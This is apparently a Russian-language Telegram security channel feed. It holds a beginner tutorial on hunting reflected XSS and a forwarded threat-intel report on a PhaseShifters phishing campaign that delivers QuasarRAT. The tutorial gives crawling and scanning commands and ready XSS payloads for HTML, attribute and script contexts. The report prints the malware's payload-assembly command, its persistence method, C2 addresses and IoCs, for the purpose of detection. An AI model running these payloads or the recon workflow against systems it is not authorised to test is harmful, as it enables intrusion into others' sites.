Fsecurity | HH

Всем привет!
После небольшого перерыва возвращаюсь с регулярными постами и сегодня мы поговорим про...Reflected XSS😂

В качестве предисловия, среди аудитории канала большое количество матерых пентестеров и баг-хантеров, но и много новичков, которые только начинают свой путь в нашей отрасли и этот пост в большей степени для них, так как все когда-то учились. Да и в целом практически каждое техническое интервью я предпочитаю начинать с вопросов про XSS, только контекст обычно зависит от грейда кандидата.
Вообще XSS-кам, как классу уязвимостей предcказывали быструю смерть еще в 2014, когда Content Security Policy 2.0 стал фактически стандартом, но в классификации OWASP-10 от 2021 года XSS уверенно удерживает 3-е место на ряду с другими инъекциям, посмотрим как ситуация изменится в этом году.

💥Таким образом XSS:
✅ Распространенная уязвимость
✅ Дает серьезный импакт в определенных условиях
✅ Автоматизация поиска и эксплуатации

❓Как искать?
✅ Собираем все url'ы с параметрами ((?q=, ?id=, и тд) с помощью:
🔧 Paramspider - использует web.archive.org для поиска url доменов из списка
paramspider -l targets.txt
🔧 Gospider - довольно быстрый веб краулер на Go

gospider -S targets.txt -a -w -r --js --sitemap --robots -d 2 -c 10 -t 20 -K 10 \
--blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg|js|dat|pdf|webp|woff|woff2|tif|ttf|tiff2)" \
-q | tee gospider-out.txt

✅ Объединяем и сортируем выхлопы в один файлик:
cd paramspider/

output
cat *.txt > paramspider_out.txt
cat paramspider_out.txt | sort -u | tee tragets_url.txt

✅ Определяем живые хосты с помощью httpx
httpx -l tragets_url.txt --threads 250 -o live_tragets_url.txt
✅ Сортируем выхлоп по расширениям:

cat live_tragets_url.txt | grep -i -e '\.php$' | tee live_tragets_url_php.txt
cat live_tragets_url.txt | grep -i -e '\.asp$' | tee live_tragets_url_asp.txt 
cat live_tragets_url.txt | grep -i -e '\.aspx$' | tee live_tragets_url_aspx.txt 
cat live_tragets_url.txt

|

grep -i -e '\.jsp$' | tee live_tragets_url_jsp.txt 
cat live_tragets_url.txt | grep -i -e '\.do$' | tee live_tragets_url_do.txt

✅ Ищем отраженные параметры с помощью:
🔧 Dalfox
dalfox file live_tragets_url_jsp.txt --skip-xss-scanning -o live_tragets_url_jsp_reflecting.txt
✅ Определяем отраженный контекст:
🔖 Reflected Between HTML Tags
<p>"><zxcvbro>Bro</p>
🔧 Используем полезную нагрузку:

<img src=x onerror=prompt(1)>
<details open ontoggle=prompt(origin)>
<svg onload=confirm(1)>

🔐 Reflected Inside HTML Tag Attributes
<input value="><zxcvbro>Bro">
🔧 Используем полезную нагрузку:

" autofocus onfocus=alert(document.domain) x="
"><script>alert(1)</script>

📜 Reflected Inside JavaScript

<script>
var input = '"><zxcvbro>Bro';
</script>

🔧 Используем полезную нагрузку:

';alert(1)//
'-alert(1)-'
</script><img src=1 onerror=alert(1)>

✅ Сдаем багу
✅ Вы великолепны💸

GitHub

GitHub - devanshbatham/ParamSpider: Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing

Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing - devanshbatham/ParamSpider

🤣1

128 views08:04

Fsecurity | HH

Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈

108 views08:07

Fsecurity | HH

Forwarded from ESCalator

Новая кампания PhaseShifters

👽

В течение мая группа киберразведки PT ESC фиксирует волну активности хакерской группировки PhaseShifters, о которой мы рассказывали в январе этого года.

Группировка проводит фишинговую рассылку, выдавая себя за Министерство образования и науки Российской Федерации. Для организации рассылки был зарегистрирован домен minobnauki.ru, MX-запись которого указывает на IP-адрес 193.124.33.207. На этом же сервере был размещен домен mail.min-prom.ru, с которого ранее PhaseShifters рассылала фишинговые письма от имени Минпромторга.

В теле фишинговых писем группировка прикладывает зашифрованный архив, внутри которого находится вредоносное ПО QuasarRAT, замаскированное под обычный документ DOCX. Внутри QuasarRAT содержит основное письмо, а рядом в архиве лежит отдельный документ-приманка, служащий приложением к основному файлу.

Во время распаковки и запуска вредоноса выполняются проверки на наличие разных антивирусных решений по ключам bdservicehost SophosHealth AvastUI AVGUI nsWscSvc ekrn, в зависимости от чего немного меняются параметры запуска.

Скрытая полезная нагрузка QuasarRAT доставляется в несколько фрагментов с расширением .adt, а затем собирается в единый исполняемый файл при помощи последовательного объединения командой

cmd /c copy /b ..\Quiet.adt + ..\Achievements.adt + ..\Yen.adt + … + ..\Panic.adt k

После успешного объединения фрагментов вредоносная программа закрепляется в системе через копирование ярлыка в папку автозагрузки пользователя, что обеспечивает его автоматический запуск при входе в систему.

Для маскировки атакующий процесс создает экземпляр RegAsm.exe, в который внедряется QuasarRAT, после чего устанавливается защищенное соединение с командным сервером 5.8.11.119:4782, на котором размещен сертификат QuasarRAT.

При этом Regasm расположен не по стандартному пути, а копируется в другую папку, откуда уже запускается для последующего инжектирования в него кода. Такие варианты запуска позволяют строить детекты или хантинг системных бинарей, запускаемых из нестандартных расположений.

Данная C2-инфраструктура уже применялась этой группировкой в предыдущих операциях, однако в тех атаках в конфигурации серверов использовались домены thelightpower.info и crostech.ru.

При анализе паттернов регистрации фишинговых доменов также выявлено, что злоумышленники предпочитают использовать IP-адреса из автономной системы AS41745 (Baykov Ilya Sergeevich).

IoCs:

2b7004cb00d58967c7d6677495d3422e
0bbb3a2ac9ba7d14a784cbc2519fbd64
40ef2615afb15f61072d7cea9b1a856a
681af8a70203832f9b8de10a8d51860a

Prilozenie_k_pis_mu.docx
Pis_mo_zapros_na_predpriatia_OPK.doc.exe.exe
Исходящий от 26.05.2025.7z

193.124.33.207
minobnauki.ru
5.8.11.119
min-prom.ru
mail.min-prom.ru
superjoke.ru
forum-drom.ru
cloud-telegram.ru
about-sport.ru